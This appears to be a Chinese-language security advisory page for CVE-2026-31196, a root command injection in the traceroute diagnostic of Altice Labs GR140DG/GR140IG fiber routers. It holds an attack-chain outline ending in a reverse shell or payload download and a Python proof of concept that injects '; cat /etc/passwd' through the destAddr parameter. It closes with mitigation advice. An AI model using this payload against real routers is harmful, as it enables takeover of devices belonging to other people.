CVE-2026-31196 CVSS 8.8 高危

CVE-2026-31196 ALTICE路由器远程代码执行漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31196

漏洞类型

远程代码执行 (RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ALTICE LABS GR140DG, GR140IG

漏洞概述

ALTICE LABS和SFR France的GR140DG及GR140IG光纤CPE/路由器设备存在严重安全漏洞。该漏洞位于/bin/httpd_clientside组件的traceroute功能中，因未对用户输入进行过滤直接调用system()函数导致。攻击者可利用特制的destAddr参数注入Shell命令，在已认证状态下以root权限执行任意代码，完全控制设备。

技术细节

该漏洞源于ALTICE LABS GR140DG和GR140IG设备中Web服务器/bin/httpd_clientside的不安全编码实践。具体来说，traceroute诊断处理程序接收用户提供的destAddr参数，并在没有适当清理或转义的情况下将其传递给底层系统的system()库调用。这种设计缺陷允许经过身份验证的远程攻击者利用Shell命令替换技术（如分号或反引号）篡改原本的traceroute命令。尽管利用该漏洞需要低权限账号（PR:L），但一旦攻击成功，由于httpd进程通常以root身份运行，攻击者将获得目标系统的最高权限，从而能够读取敏感数据、修改系统配置或进一步植入持久化后门。

攻击链分析

STEP 1

侦察

识别目标设备为ALTICE GR140DG或GR140IG系列路由器，并确认其开放Web管理接口。

STEP 2

获取访问权限

利用弱口令或社会工程学手段获取一个低权限的认证账号（满足PR:L要求）。

STEP 3

漏洞利用

向路由器的traceroute诊断接口发送特制的HTTP POST请求，在destAddr参数中注入恶意Shell命令（如; `cmd`）。

STEP 4

命令执行

后端/bin/httpd_clientside进程将未经过滤的参数传递给system()函数，导致恶意命令以root权限在系统上执行。

STEP 5

建立控制

攻击者利用执行的命令反弹Shell或下载恶意载荷，从而完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable endpoint
# Note: The specific endpoint path may vary based on firmware analysis
target_url = "http://<target_ip>/cgi-bin/httpd_clientside"

# Authentication credentials (required as per PR:L)
session = requests.Session()
# Perform login to obtain authenticated session cookies
# login_data = {"username": "user", "password": "password"}
# session.post("<login_url>", data=login_data)

# Exploit Payload: Using command substitution to execute 'cat /etc/passwd'
# The 'destAddr' parameter is vulnerable to command injection
exploit_payload = {
    "action": "traceroute",
    "destAddr": "8.8.8.8; cat /etc/passwd"  # Injection vector
}

try:
    # Send the malicious request
    response = session.post(target_url, data=exploit_payload, timeout=5)
    print("Status Code:", response.status_code)
    print("Response Body:", response.text)
    # If successful, the response will contain the output of the injected command
except Exception as e:
    print("An error occurred:", e)

影响范围

ALTICE LABS GR140DG

ALTICE LABS GR140IG

防御指南

临时缓解措施

建议用户暂时禁用路由器的远程管理功能，并将Web管理界面仅限制在局域网内访问。同时，应立即修改路由器默认的管理员密码，防止攻击者利用低权限账号进行登录尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-31196
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-31196
3 Details https://www.cvedetails.com/cve/CVE-2026-31196/
4 VulDB https://vuldb.com/cve/CVE-2026-31196
5 Link http://altice.com
6 Link http://gr140dg.com
7 Link https://xerod.ai/advisories/XEROD-2026-0002

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表